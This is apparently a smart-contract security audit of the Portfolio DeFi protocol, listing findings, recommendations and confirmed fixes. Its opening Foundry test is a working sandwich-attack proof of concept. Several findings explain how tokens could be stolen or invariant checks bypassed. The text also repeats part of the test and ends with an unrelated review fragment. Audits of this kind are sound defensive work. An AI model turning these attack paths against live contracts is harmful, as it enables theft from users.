// SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import "./Setup.sol"; import "contracts/libraries/RMM01Lib.sol"; import "forge-std/console2.sol"; contract TestSpearbit is Setup { using RMM01Lib for PortfolioPool; // sorry, didn't know how to use the modifiers for testing 2 actors at the same time function test_allocate_sandwich() public defaultConfig { uint256 initialBalance = 100e18; address victim = address(actor()); address mev = address(0x54321); ghost().asset().prepare(address(victim), address(subject()), initialBalance); ghost().quote().prepare(address(victim), address(subject()), initialBalance); addGhostActor(mev); setGhostActor(mev); vm.startPrank(mev); // need to prank here for approvals in `prepare` to work ghost().asset().prepare(address(mev), address(subject()), initialBalance); ghost().quote().prepare(address(mev), address(subject()), initialBalance); vm.stopPrank(); vm.startPrank(victim); subject().fund(ghost().asset().to_addr(), initialBalance); subject().fund(ghost().quote().to_addr(), initialBalance); vm.stopPrank(); vm.startPrank(mev); subject().fund(ghost().asset().to_addr(), initialBalance); subject().fund(ghost().quote().to_addr(), initialBalance); vm.stopPrank(); // 0. some user provides initial liquidity, so MEV can actually swap in the pool vm.startPrank(victim); subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), poolId: ghost().poolId, deltaLiquidity: 10e18 }) ); vm.stopPrank(); // 1. MEV swaps, changing the virtualX/Y LP price (skewing the reserves) vm.startPrank(mev); uint128 amtIn = 6e18; bool sellAsset = true; uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0))); vm.stopPrank(); // 2. victim allocates { uint256 victim_asset_balance = ghost().balance(victim, ghost().asset().to_addr()); uint256 victim_quote_balance = ghost().balance(victim, ghost().quote().to_addr()); vm.startPrank(victim); subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), poolId: ghost().poolId, deltaLiquidity: 10e18 }) ); vm.stopPrank(); PortfolioPool memory pool = ghost().pool(); (uint256 x, uint256 y) = pool.getVirtualPoolReservesPerLiquidityInWad(); console2.log("getVirtualPoolReservesPerLiquidityInWad: %s \t %y \t %s", x, y); victim_asset_balance -= ghost().balance(victim, ghost().asset().to_addr()); victim_quote_balance -= ghost().balance(victim, ghost().quote().to_addr()); console2.log( "victim used asset/quote for allocate: %s \t %y \t %s", victim_asset_balance, victim_quote_balance ); // w/o sandwich: 3e18 / 30e18 } // 3. MEV swaps back, ending up with more tokens than their initial balance vm.startPrank(mev); sellAsset = !sellAsset; amtIn = amtOut; // @audit-issue this only works after patching Invariant.getX to use y - k. still need to reduce the amtOut a tiny bit because of rounding errors amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)) * (1e4 - 1) / 1e4; subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0))); vm.stopPrank(); uint256 mev_asset_balance = ghost().balance(mev, ghost().asset().to_addr()); uint256 mev_quote_balance = ghost().balance(mev, ghost().quote().to_addr()); assertGt(mev_asset_balance, initialBalance); assertGe(mev_quote_balance, initialBalance); console2.log( "MEV asset/quote profit: %s \t %s", mev_asset_balance - initialBalance, mev_quote_balance - initialBalance ); }
            vm.stopPrank();

            uint256 mev_asset_balance = ghost().balance(mev, ghost().asset().to_addr());
            uint256 mev_quote_balance = ghost().balance(mev, ghost().quote().to_addr());
            assertGt(mev_asset_balance, initialBalance);
            assertGe(mev_quote_balance, initialBalance);
            console2.log(
                "MEV asset/quote profit: %s \t %s", mev_asset_balance - initialBalance, mev_quote_balance - initialBalance
            );
        }
    }

Recommendation: Consider adding maxDeltaAsset and maxDeltaQuote parameters to allocate. If either of these parameters is exceeded, revert the allocation. The same issue can happen with de-allocate; consider adding minDeltaAsset and minDeltaQuote amounts for it. If either of these parameters falls short, revert the deallocation. Primitive: Resolved by implementing minAmount / maxAmount in PR 307. Spearbit: Fixed.

5.3 Medium Risk

+5.3.1 Missing signextend when dealing with non-full word signed integers Severity: Medium Risk Context: AssemblyLib.sol#L83 Description: AssemblyLib uses operations on signed integers narrower than a full word. If signed data on the stack has not been sign-extended, two's-complement arithmetic will not work properly, most probably reverting. The Solidity compiler performs this cleanup, but the cleanup is not guaranteed when using inline assembly. Recommendation: Consider sign-extending the data before it is used, e.g. delta := signextend(15, delta), or just use Solidity instead of inline assembly. Primitive: The team decided to remove the assembly code and simply use Solidity. A lot of different cases were possible, and covering all of them in assembly would eventually have cost more in the end. Addressed in PR 319. Spearbit: Fixed.

+5.3.2 Tokens With Multiple Addresses Can Be Stolen Due to Reliance on balanceOf Severity: Medium Risk Context: AccountLib.sol#L230 Description: Some ERC20 tokens have multiple valid contract addresses that serve as entrypoints for manipulating the same underlying storage (such as Synthetix tokens like SNX and sBTC, and the TUSD stablecoin). Because the FVM holds all tokens for all pools in the same contract, assumes that a contract address is a unique identifier for a token, and relies on the return value of balanceOf for manipulated tokens to determine what transfers are needed during transaction settlement, multiple-entrypoint tokens are not safe to use in pools. For example, suppose there is a pool with non-zero liquidity where one token has a second valid address. An attacker can atomically create a second pool using the alternate address, allocate liquidity, and then immediately deallocate it. During execution of the _settlement function, getNetBalance will return a positive net balance for the double-entrypoint token, crediting the attacker and transferring them the entire balance of the double-entrypoint token. This attack only costs gas, as the allocation and deallocation of non-double-entrypoint tokens will cancel out. Recommendation: At a minimum, anyone interacting with contracts derived from PortfolioVirtual should be explicitly warned not to create pools containing tokens with multiple valid addresses. An explicit blacklist could be added to prevent any address other than an "official" one from being used to create pairs and pools for such tokens (potentially fixed at deployment time, as double-entrypoint tokens are rare and now widely known to be dangerous); a sketch of this blacklist idea follows below. Architecturally, tokens could be stored in dedicated, special-purpose contracts for each token address, although this would increase gas costs and complexity.
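As an illustration of the blacklist idea, a minimal sketch (the mapping name, error, and hook point are assumptions, not Portfolio's actual API):

    // Sketch: non-canonical entrypoints of multiple-address tokens (e.g. the
    // alternate Synthetix/TUSD addresses) are registered at deployment and
    // rejected whenever a pair or pool would be created with them.
    mapping(address => bool) private _blockedTokenEntrypoints;

    error NonCanonicalTokenAddress(address token);

    function _checkTokenAddress(address token) internal view {
        if (_blockedTokenEntrypoints[token]) revert NonCanonicalTokenAddress(token);
    }

Calling such a check from pair/pool creation would stop the second pool in the example above from ever being created.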
Spearbit: Marked as Acknowledged.

+5.3.3 Swap amounts are always estimated with priority fee Severity: Medium Risk Context: RMM01Lib.sol#L70, Portfolio.sol#L416 Description: A pool can have a priority fee that is only applied when the pool controller (contract) performs a swap. However, when estimating a swap with getAmountOut, the priority fee will always be applied as long as there is a controller and a priority fee. As the priority fee is usually less than the normal fee, the input amount will be underestimated for non-controllers; the input amount will be too low and the swap reverts. Recommendation: Apply the priority fee only if the swapper is the controller. It might be useful to extend getAmountOut with an additional address parameter indicating the swap caller. This is because when the swap amounts are estimated offchain using eth_call, the msg.sender defaults to the zero address. Alternatively, use eth_call's from parameter. Note that adding the parameter to the function might still be useful for other smart contracts that want to estimate swaps. Primitive: Decided to follow the recommendation and add an extra parameter to getAmountOut and the related functions in PR 312. Spearbit: Resolved.

+5.3.4 Rounding functions are wrong for negative integers Severity: Medium Risk Context: AssemblyLib.sol#L297, RMM01Portfolio.sol#L139-L143 Description: AssemblyLib.scaleFromWadUpSigned and AssemblyLib.scaleFromWadDownSigned both work on int256s and therefore also on negative integers. However, the rounding is wrong for these. Rounding down should mean rounding towards negative infinity, and rounding up should mean rounding towards positive infinity. scaleFromWadDownSigned only performs a truncation, rounding negative integers towards zero. This function is used in checkInvariant to ensure the new invariant is not less than the live invariant in a swap:

    int256 liveInvariantWad = invariant.scaleFromWadDownSigned(pools[poolId].pair.decimalsQuote);
    int256 nextInvariantWad = nextInvariant.scaleFromWadDownSigned(
        pools[poolId].pair.decimalsQuote
    );
    nextInvariantWad >= liveInvariantWad

It can happen for quote tokens with fewer decimals, for example 6 with USDC, that liveInvariantWad was rounded from a positive 0.9999e12 value to zero, and nextInvariantWad was rounded from a negative value of -0.9999e12 to zero. The check passes even though the invariant is violated by almost 2 quote token units. Recommendation: Consider properly rounding negative integers towards negative infinity in scaleFromWadDownSigned and towards positive infinity in scaleFromWadUpSigned (see the sketch below). Add tests for these functions to ensure they work correctly on negative integers.
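For reference, a minimal sketch of sign-correct rounding in plain Solidity (the factor derivation mirrors the WAD-to-token-decimals conversion; names and layout are assumptions, not the fixed library code):

    // Floor division: round toward negative infinity.
    function scaleFromWadDownSigned(int256 amountWad, uint256 decimals) internal pure returns (int256 q) {
        int256 factor = int256(10 ** (18 - decimals));
        q = amountWad / factor; // Solidity division truncates toward zero
        // Truncation rounded a negative value up; step down by one to floor it.
        if (amountWad % factor != 0 && amountWad < 0) q -= 1;
    }

    // Ceiling division: round toward positive infinity.
    function scaleFromWadUpSigned(int256 amountWad, uint256 decimals) internal pure returns (int256 q) {
        int256 factor = int256(10 ** (18 - decimals));
        q = amountWad / factor;
        // Truncation rounded a positive value down; step up by one to ceil it.
        if (amountWad % factor != 0 && amountWad > 0) q += 1;
    }

With this floor behavior, -0.9999e12 scaled to 6 decimals becomes -1 instead of 0, so the checkInvariant comparison above no longer passes for the USDC example.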
Primitive: Fixed in PR 326. Spearbit: Fixed.

+5.3.5 LPs can lose fees if fee growth accumulator overflows their checkpoint Severity: Medium Risk Context: PortfolioLib.sol#L215-L224 Description: Fees (that are not reinvested in the pool) are currently tracked through the accumulator values pool.feeGrowthGlobalAsset and pool.feeGrowthGlobalQuote, computed as asset or quote per liquidity. Each user providing liquidity has a checkpoint of these values from their last sync (claim). When syncing new fees, the distance from the current value to the user's checkpoint is computed and multiplied by their liquidity. The accumulator values are deliberately allowed to overflow, as only the distance matters. However, if an LP does not sync their fees while the accumulator grows, overflows, and grows larger than their last checkpoint, the LP loses all fees. Example:
• User allocates at pool.feeGrowthGlobalAsset = 1000e36.
• pool.feeGrowthGlobalAsset grows and overflows to 0. differenceAsset is still accurate.
• pool.feeGrowthGlobalAsset grows more and is now at 1000e36 again. differenceAsset will be zero. If the user only claims their fees now, they'll earn 0 fees.
Recommendation: LPs need to claim their fees before their checkpoint is reached. Alternatively, consider ways to accurately track LP fees that do not have this issue. Note that the same issue exists for the pool controller's invariantGrowth, but this functionality is not used for anything yet. Primitive: Claiming mechanism was removed. Spearbit: Fees are now always reinvested into the pool; claiming is no longer necessary and was removed. This issue is no longer relevant.

5.4 Low Risk

5.5 Gas Optimization

+5.5.1 Unnecessary left shift in encodePoolId Severity: Gas Optimization Context: FVMLib.sol#L220 Description: encodePoolId performs a left shift of 0. This is a no-op. Recommendation: Remove the shl(0, .). Primitive: Resolved in PR 306. Spearbit: Resolved.

+5.5.2 _syncPool performs unnecessary pool state updates Severity: Gas Optimization Context: Portfolio.sol#L638-L639 Description: The _syncPool function is only called during a swap. During a swap the liquidity never changes, and the pool's last timestamp has already been updated in _beforeSwapEffects. Recommendation: Consider removing the updates to liquidity and lastTimestamp in _syncPool. Primitive: Fixed in PR 333. Spearbit: Fixed; liquidity is not updated again. The timestamp is still updated if it has not been updated yet, to make Portfolio more general and work with other RMMs that might not update the timestamp in the beforeSwap hook.

+5.5.3 Portfolio.sol gas optimizations Severity: Gas Optimization Context: Portfolio.sol Description: Throughout the contract we've identified a number of minor gas optimizations that can be performed. We've gathered them into one issue to keep the issue count as small as possible.
• L750: The msg.value > 0 check is also done in the __wrapEther__ call.
• L262: The following subtractions can be optimized in the case where assets are 0, by moving each instruction within the ifs on lines 256-266: pos.tokensOwedAsset -= claimedAssets.safeCastTo128(); pos.tokensOwedQuote -= claimedQuotes.safeCastTo128();
• L376: Consider using the pool object (if it remains as a storage object) instead of pools[args.poolId].
• L444:L445: The following two instructions can be grouped into one: output = args.output; output = output.scaleToWad(...
• L436:L443: The internalBalance variable can be discarded, as it is used only within the input assignment:

    uint256 internalBalance = getBalance(
        msg.sender,
        _state.sell ? pool.pair.tokenAsset : pool.pair.tokenQuote
    );
    input = args.useMax == 1 ? internalBalance : args.input;
    input = input.scaleToWad(
        _state.sell ? pool.pair.decimalsAsset : pool.pair.decimalsQuote
    );

• L808: Assuming that the swap instruction will be one of the most used instructions, it might be worth moving it to be the first if condition to save gas.
• L409: The if (args.input == 0) revert ZeroInput(); can be removed, as it will result in iteration.input being zero and reverting on L457.
Recommendation: Implement the gas optimization suggestions. Primitive: Resolved in PR 309. The only recommendation left is to use the pool object with the storage keyword; however, this might lead to an increase of the size of the contract. We'll wait until the other branches are merged to see if we can afford this one or not.
Also, the msg.value > 0 check was removed in the __wrapEther__ function and kept in _deposit, which is the only caller of __wrapEther__. Spearbit: Fixed.

5.6 Informational

+5.6.1 Incomplete NatSpec comments Severity: Informational Context: IPortfolio.sol#L6 Description: Throughout the IPortfolio.sol interface, various NatSpec comments are missing or incomplete. Recommendation: Consider adding the necessary documentation to this file to help 3rd parties easily integrate with a Portfolio. Primitive: Acknowledged. Spearbit: Acknowledged.

+5.6.2 Inaccurate Comments Severity: Informational Context: [1] Portfolio.sol#L26, [2] RMM01Portfolio.sol#L130, [3] FVMLib.sol#L94-L95 Description: These comments are inaccurate. [1] The hex value on this line translates to v0.1.0-beta instead of v1.0.0-beta. [2] computeTau returns either the time until pool maturity, or zero if the pool is already expired. [3] These comments do not properly account for the two-byte offset from the start of the array (in L94, only in the endpoint of the slice). Recommendation: Correct or remove the inaccuracies. Primitive: Related PR 318. Spearbit: Fixed.

+5.6.3 Check for priorityFee should have its own custom error Severity: Informational Context: PortfolioLib.sol#L428 Description: The check for an invalid priorityFee within the checkParameters function uses the same custom error as the one for fee. This could lead to confusion in the error output. Recommendation: Since all other checks have their own unique custom errors, one should be added for priorityFee: error InvalidPriorityFee(uint16 priorityFee); Primitive: Resolved in PR 317. Spearbit: Resolved.

+5.6.4 Unclear @dev comment Severity: Informational Context: AccountLib.sol#L123 Description: This comment is misleading. It implies that cache is used to "check" state while it in fact changes it. Recommendation: The comment should be updated to reflect this. Primitive: Resolved in PR 315. Spearbit: Resolved.

+5.6.5 Unused custom error Severity: Informational Context: AccountLib.sol#L52 Description: Unused error: error AlreadySettled(); Recommendation: This custom error should be removed as it remains unused (or given a use). Primitive: Resolved; the custom error has been removed in PR 313. Spearbit: Resolved.

+5.6.6 Use named constants Severity: Informational Context: FVMLib.sol#L494 Description: The decodeSwap function compares a value against the constant 6. This value indicates the SWAP_ASSET constant. sellAsset := eq(6, and(0x0F, byte(0, value))) Recommendation: Consider using named constants instead of inlining constants. This makes the code easier to understand and is future-proof in case the named constant's value changes in the future. Primitive: Resolved by adding a comment explaining why we are using 6, what it represents, and how the bytes1 variable is padded: PR 314. Spearbit: Resolved by adding a comment. The risk of discrepancies when the named constant's value is changed still exists.

+5.6.7 scaleFromWadUp and scaleFromWadUpSigned can underflow Severity: Informational Context: AssemblyLib.sol#L283, AssemblyLib.sol#L303 Description: scaleFromWadUp and scaleFromWadUpSigned will underflow if the amountWad parameter is 0, because they perform an unchecked subtraction on it: outputDec := add(div(sub(amountWad, 1), factor), 1) // ((a-1) / b) + 1 Recommendation: Note that these functions are currently not used. Consider removing them or performing a checked subtraction (see the sketch below).
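A minimal sketch of the checked variant in plain Solidity, treating factor as the already-derived scaling divisor (names assumed; the original assembly is quoted in the finding):

    // Ceiling division that tolerates amountWad == 0 instead of underflowing.
    function scaleFromWadUp(uint256 amountWad, uint256 factor) internal pure returns (uint256 outputDec) {
        if (amountWad == 0) return 0;             // (0 - 1) would underflow below
        outputDec = (amountWad - 1) / factor + 1; // ((a-1) / b) + 1, rounded up
    }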
Primitive: Fixed in PR 327. Spearbit: Fixed.

+5.6.8 AssemblyLib.pack does not clear lower's upper bits Severity: Informational Context: AssemblyLib.sol#L222 Description: The pack function packs the 4 lower bits of two bytes into a single byte. If the lower parameter has dirty upper bits, they will be mixed with the higher byte and be set on the final return value. Recommendation: Clear the 4 upper bits of the lower byte in pack (a sketch follows after finding 5.6.13 below). Primitive: Good catch! Here is the fix: PR 303. Spearbit: Resolved.

+5.6.9 AssemblyLib.toBytes8/16 functions assume a max raw length of 16 Severity: Informational Context: AssemblyLib.sol#L159 Description: The toBytes16 function only works if the length of the bytes raw parameter is at most 16, because of the unchecked subtraction: let shift := mul(sub(16, mload(raw)), 8) The same issue exists for the toBytes8 function. Recommendation: Consider checking the length so the subtraction doesn't underflow. Primitive: Resolved: PR 308. Spearbit: Resolved.

+5.6.10 PortfolioLib.maturity returns wrong value for perpetual pools Severity: Informational Context: PortfolioLib.sol#L373 Description: A pool can be a perpetual pool, which is modeled as a pool with a time to maturity always set to 1 year in computeTau. However, the maturity function does not return this same maturity. This currently isn't a problem, as maturity is only called from computeTau in the case where it is not a perpetual pool. Recommendation: Consider adding a dev comment that maturity is inaccurate for perpetual pools, or return block.timestamp + SECONDS_PER_YEAR for perpetual pools. Primitive: Fixed in PR 328. Spearbit: Fixed.

+5.6.11 _createPool has incomplete NatSpec and event args Severity: Informational Context: Portfolio.sol#L683, Portfolio.sol#L732 Description: The _createPool function contains incomplete NatSpec specifications. Furthermore, the event emitted by this function could be improved by adding more arguments. Recommendation: Consider completing the NatSpec of this function and adding more arguments that would be useful for later reporting and debugging. Primitive: Resolved in PR 311. Spearbit: Resolved.

+5.6.12 _liquidityPolicy is cast to a uint8 but it should be a uint16 Severity: Informational Context: Portfolio.sol#L719 Description: During _createPool the pool curve parameters are set. One of them is the jit parameter, which is a uint16. It can be assigned the default value of _liquidityPolicy, but it is cast to a uint8. If the _liquidityPolicy constant is ever changed to a value greater than type(uint8).max, a wrong jit value will be assigned. Recommendation: Cast _liquidityPolicy to a uint16:

    - jit: hasController ? jit : uint8(_liquidityPolicy),
    + jit: hasController ? jit : uint16(_liquidityPolicy),

Primitive: Resolved in PR 310. Spearbit: Resolved.

+5.6.13 Update _feeSavingEffects documentation Severity: Informational Context: Objective.sol#L20 Description: The _feeSavingEffects documentation states: @return bool True if the fees were saved in position's owed tokens instead of re-invested. Recommendation: There is no position with owed tokens that gets updated in this function, as a position refers to a single user position. The function updates _state.feeGrowthGlobal and afterward the global fee accumulator pool.feeGrowthGlobalAsset/Quote for all LPs. Primitive: Resolved in PR 320. Spearbit: Fixed.
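A sketch of the masking fix mentioned in finding 5.6.8 above, in plain Solidity rather than the library's assembly (semantics assumed from the finding's description):

    // Packs the low nibble of `upper` into the high 4 bits of the result and
    // the low nibble of `lower` into the low 4 bits. Masking `lower` with 0x0F
    // keeps dirty upper bits from leaking into the high nibble; the left shift
    // drops `upper`'s own high nibble by uint8 truncation.
    function pack(bytes1 upper, bytes1 lower) internal pure returns (bytes1) {
        return bytes1((uint8(upper) << 4) | (uint8(lower) & 0x0F));
    }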
+5.6.14 Document checkInvariant and resolve confusing naming Severity: Informational Context: RMM01Portfolio.sol#L141, Objective.sol#L61 Description: The checkInvariant function's return values are undocumented, and the variable names used are confusing. Recommendation: Document the checkInvariant function's return values in Objective and state the decimals the invariant is in (WAD). Consider renaming the variables to better match their scaling units:
• nextInvariantWad -> nextInvariantQuote, as this variable is in quote units after the scale-down.
• nextInvariant -> nextInvariantWad, as this variable is in WAD units.
• liveInvariantWad -> liveInvariantQuote, as this variable is in quote units after the scale-down.
Consider doing the invariant check on the WAD invariants, which would make the quote invariants obsolete. Primitive: PR 326 removes the confusing scaling altogether. This means the invariant check is for full WAD precision, which is overall better validation that the invariant was not manipulated in a way that takes advantage of the scaling that was happening. Spearbit: Fixed.

6 Appendix

6.1 Appendix: Summary The two Lead Security Researchers from the main review participated in an extension period from May 8th to May 12th targeting commit 86f8ee. During this period of time, 9 issues were found, and fixes to issues from the original review were validated or acknowledged.

6.2 High Risk

+6.2.1 Token amounts are in wrong decimals if useMax parameter is used Severity: High Risk Context: Portfolio.sol#L227-L237, Portfolio.sol#L444-L448 Description: The allocate and swap functions have a useMax parameter that sets the token amounts to be used to the net balance of the contract. This net balance is the return value of a getNetBalance call, which is in token decimals. The code that follows (getPoolMaxLiquidity for allocate, iteration.input for swap) expects these amounts to be in WAD units. Using this parameter with tokens that don't have 18 decimals does not work correctly. The actual tokens used will be far lower than the expected amount, which will lead to user loss as the tokens remain in the contract after the action. Recommendation: Scale these amounts to WAD units (a sketch follows below). Add tests for both scenarios.
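A minimal sketch of the scaling fix (the helper name and the getNetBalance signature are assumptions; scaleToWad-style conversions appear elsewhere in the codebase for exactly this purpose):

    // When useMax is set, the net balance is read in token decimals and must
    // be scaled to WAD before the WAD-denominated math (getPoolMaxLiquidity /
    // iteration.input) consumes it.
    function _useMaxAmountWad(address token, uint256 decimals) internal view returns (uint256 amountWad) {
        int256 net = getNetBalance(token);          // token decimals, can be negative
        uint256 amount = net > 0 ? uint256(net) : 0;
        amountWad = amount * 10 ** (18 - decimals); // token decimals -> WAD
    }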
Primitive: Fixed in PR 387. Spearbit: Fixed.

6.3 Medium Risk

+6.3.1 getAmountOut underestimates outputs leading to losses Severity: Medium Risk Context: BisectionLib.sol#L54 Description: When computing the output, getAmountOut performs a bisection. However, this bisection returns any root of the function, not the lowest root. As the invariant is far from being strictly monotonic in R_x, it contains many neighbouring roots (> 2e9 in the example), and it's important to return the lowest root, corresponding to the lowest nextDependent, i.e., the one that leads to the largest output amount amountOut = prevDependent - nextDependent. Users using this function to estimate their outputs can incur significant losses.
• Example: Calling getAmountOut(poolId, false, 1, 0, address(0)) with the pool configuration in the example will return amtOut = 123695775, whereas the real max possible amtOut for that swap is 33x higher at 4089008108.
The core issue is that the invariant is not strictly monotonic, invariant(R_x, R_y) = invariant(R_x + 2_852_050_358, R_y); there are many neighbouring roots for the pool configuration:

    function test_eval() public {
        uint128 R_y = 56075575;
        uint128 R_x = 477959654248878758;
        uint128 stk = 117322822;
        uint128 vol = 406600000000000000;
        uint128 tau = 2332800;
        int256 prev = Invariant.invariant({R_y: R_y, R_x: R_x, stk: stk, vol: vol, tau: tau});
        // this is the actual dependent that still satisfies the invariant
        R_x -= 2_852_050_358;
        int256 post = Invariant.invariant({R_y: R_y, R_x: R_x, stk: stk, vol: vol, tau: tau});
        console2.log("prev: %s", prev);
        console2.log("post: %s", post);
        assertEq(post, prev);
        assertEq(post, 0);
    }

Recommendation: To return the lowest root, the bisection has to:
• Not return the first midpoint that is a root.
• If it found a root, search the [lower, midPoint] interval for a lower root. The current code searches the [midPoint, upper] interval if output or lowerOutput is 0. The if (output * lowerOutput < 0) condition should be changed to if (output * lowerOutput <= 0):

    function bisection(
        Bisection memory args,
        uint256 lower,
        uint256 upper,
        uint256 epsilon,
        uint256 maxIterations,
        function(Bisection memory,uint256) pure returns (int256) fx
    ) pure returns (uint256 root) {
        // ...
        do {
            // Bisection uses the point between the lower and upper bounds.
            // The `distance` is halved each iteration.
            root = (lower + upper) / 2;

            int256 output = fx(args, root);
    -       if (output == 0) break; // Found the root.

            lowerOutput = fx(args, lower); // Lower point could have changed in the previous iteration.

            // If the product is negative, the root is between the lower and root.
            // If the product is positive, the root is between the root and upper.
    -       if (output * lowerOutput < 0) {
    +       // must be <= instead of < so if mid is a root, we keep looking for a lower root on the left (set new upper bound to mid)
    +       if (output * lowerOutput <= 0) {
                upper = root; // Set the new upper bound to the root because we know its between the lower and root.
            } else {
                lower = root; // Set the new lower bound to the root because we know its between the upper and root.
            }

            // Update the distance with the new bounds.
            distance = upper - lower;
            unchecked {
                iterations++; // Increment the iterator.
            }
        } while (...);
    }

This might return the lowest root - 1, which is then increased by 1 in computeSwapStep. Primitive: Recommended changes were made in PR 388. Spearbit: Fixed.

+6.3.2 getAmountOut Calculates an Output Value That Sets the Invariant to Zero, Instead of Preserving Its Value Severity: Medium Risk Context: [1] RMM01Lib.sol#L84, [2] RMM01Lib.sol#L215, [3] RMM01Lib.sol#L231 Description: The swap function enforces that the pool's invariant value does not decrease; however, the getAmountOut function computes an expected swap output based on setting the pool's invariant to zero, which is only equivalent if the initial value of the invariant was already zero--which will generally not be the case as fees accrue and time passes. This is because in computeSwapStep (invoked by getAmountOut [1]), the function (optimizeDependentReserve) passed [2] to the bisection algorithm for root finding returns just the invariant evaluated on the current arguments [3] instead of the difference between the evaluated and original invariant.
As a consequence, getAmountOut will return an inaccurate result when the starting value of the invariant is non-zero, leading to either disadvantageous swaps or swaps that revert, depending on whether the current pool invariant value is less than or greater than zero. Recommendation: Add another field to the Bisection struct for the initial invariant value, and modify optimizeDependentReserve to return the difference between the value it currently returns and the initial invariant value. Primitive: Fixed in commit cbec75. Spearbit: Fix confirmed.

+6.3.3 getAmountOut Does Not Adjust The Pool's Reserve Values Based on the liquidityDelta Parameter Severity: Medium Risk Context: RMM01Lib.sol#L111-L128 Description: The liquidityDelta parameter allows a caller to adjust the liquidity in a pool before simulating a swap. However, corresponding adjustments are not made to the per-pool reserves, virtualX and virtualY. This makes the reserve-to-liquidity ratios used in the calculations incorrect, leading to inaccurate results (or potentially reverts if the invalid values fall outside of allowed ranges). Use of the inaccurate swap outputs could lead either to swaps at bad prices or swaps that revert unexpectedly. Recommendation: Adjust the pool reserve values based on the liquidityDelta parameter, add them as additional parameters, or remove the liquidityDelta parameter. Primitive: Fixed by removing liquidityDelta in PR 389. Spearbit: Fix confirmed.

6.4 Low Risk

+6.4.1 Bisection always uses max iterations Severity: Low Risk Context: BisectionLib.sol#L51 Description: The current bisection algorithm chooses the midpoint as root = (lower + upper) / 2; and the bisection terminates if either upper - lower < 0 or maxIterations is reached. Given upper >= lower throughout the code, it's easy to see that upper - lower < 0 can never be satisfied. The bisection will always use the max iterations. However, even with an epsilon of 1 it can happen that the midpoint root is the same as the lower bound, if upper = lower + 1. The if (output * lowerOutput < 0) condition will never be satisfied, and the else case will always run, setting the lower bound to itself. The bisection will keep iterating with the same lower and upper bounds until max iterations are reached. Recommendation: Consider choosing an epsilon of 1 and changing the condition to:

    - uint256 constant BISECTION_EPSILON = 0;
    + uint256 constant BISECTION_EPSILON = 1;

    - while (distance >= epsilon && iterations != maxIterations);
    + while (distance > epsilon && iterations < maxIterations);

Primitive: Fixed in commit b643d8. Spearbit: Fix verified.

+6.4.2 Potential reentrancy in claimFees Severity: Low Risk Context: Portfolio.sol#L890 Description: The contract performs all transfers in the _settlement function, and therefore _settlement can call back to the user for reentrant tokens. To avoid reentrancy issues the _preLock() modifier implements a reentrancy check, but only if the called action is not happening during a multicall execution:

    function _preLock() private {
        // Reverts if the lock was already set and the current call is not a multicall.
        if (_locked != 1 && !_currentMulticall) {
            revert InvalidReentrancy();
        }
        _locked = 2;
    }

Therefore, multicalls are not protected against reentrancy, and _settlement should be executed only once, at the end of the original multicall function. However, the claimFee function can be called through a multicall by the protocol owner, and it calls _settlement even if the execution is part of a multicall.
Recommendation: All _settlement() calls outside of multicall should be guarded with if (_currentMulticall == false) _settlement(); so that settlement does not execute during a multicall. The claimFee function is missing this guard. Primitive: Fixed in commit 7ee048. Spearbit: Fix confirmed.

6.5 Gas Optimization

+6.5.1 Bisection can be optimized Severity: Gas Optimization Context: BisectionLib.sol#L53-L63 Description: The bisection algorithm tries to find a root of the monotonic function. Evaluating the expensive invariant function at the lower point on each iteration can be avoided by caching the output function value whenever a new lower bound is set. Recommendation: Consider changing the code to:

    - lowerOutput = fx(args, lower); // Lower point could have changed in the previous iteration.

      // If the product is negative, the root is between the lower and root.
      // If the product is positive, the root is between the root and upper.
      if (output * lowerOutput < 0) {
          upper = root; // Set the new upper bound to the root because we know its between the lower and root.
      } else {
          lower = root; // Set the new lower bound to the root because we know its between the upper and root.
    +     lowerOutput = output; // root function value becomes new lower output value
      }

Primitive: Fixed in PR 386. Spearbit: Fixed.

6.6 Informational

+6.6.1 Pool existence check in swap should happen earlier Severity: Informational Context: Portfolio.sol#L431 Description: The swap function makes use of the pool pair's tokens to scale the input decimals before it checks whether the pool even exists. Recommendation: Consider checking that the pool exists before using any pool storage variables. Primitive: Fixed in commit e440fc. Spearbit: Fix confirmed.

+6.6.2 Pool creation in test uses wrong duration and volatility Severity: Informational Context: HelperConfigsLib.sol#L166-L167 Description: The second path with pairId != 0 in HelperConfigsLib's pool creation calls the createPool method with the volatility and duration parameters swapped, leading to wrong pool creations in tests that use this path. Recommendation: The volatility parameter comes before the duration parameter.

    } else {
        bytes[] memory data = new bytes[](1);
        data[0] = abi.encodeCall(
            IPortfolioActions.createPool,
            (
                pairId, // uses 0 pairId as magic variable. todo: maybe change to max uint24?
                self.controller,
                self.priorityFeeBps,
                self.feeBps,
    -           self.durationDays,
    -           self.volatilityBps,
    +           self.volatilityBps,
    +           self.durationDays,
                self.terminalPriceWad,
                self.reportedPriceWad
            )
        );
    }

Primitive: Fixed in PR 384. Spearbit: Fixed.

diff --git a/findings_newupdate/spearbit/Seadrop-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Seadrop-Spearbit-Security-Review.txt
new file mode 100644
index 0000000..019a1bc
--- /dev/null
+++ b/findings_newupdate/spearbit/Seadrop-Spearbit-Security-Review.txt
@@ -0,0 +1,51 @@
+5.1.1 An allowed signer can sign mints with malicious parameters Severity: High Risk Context: SeaDrop.sol#L259-L266, SeaDrop.sol#L318-L319 Description: An allowed signer (SeaDrop.sol#L318-L319) can sign mints that have either:
• mintParams.feeBps equal to 0.
• A custom feeRecipient with mintParams.restrictFeeRecipients equal to false to circumvent the check at SeaDrop.sol#L469.
And thus avoid the protocol fee being paid, or allow the protocol fee to be sent to a desired address decided by the signer. Note that the ERC721SeaDrop owner can allow signers by calling ERC721SeaDrop.updateSigner. Therefore, the owner can allow an address they control as a signer and sign mints that have either one of the above features. OpenSea: This is correct; currently any signer would have ultimate control over the parameters of a mint, and this should be understood by parties who wish to use a centralized signer, i.e., self-hosted or in a legal agreement with a marketplace. However, we could make it slightly less "trustful" by storing a struct of validation params rather than a simple bool in the mapping:

    struct SignedMintParams {
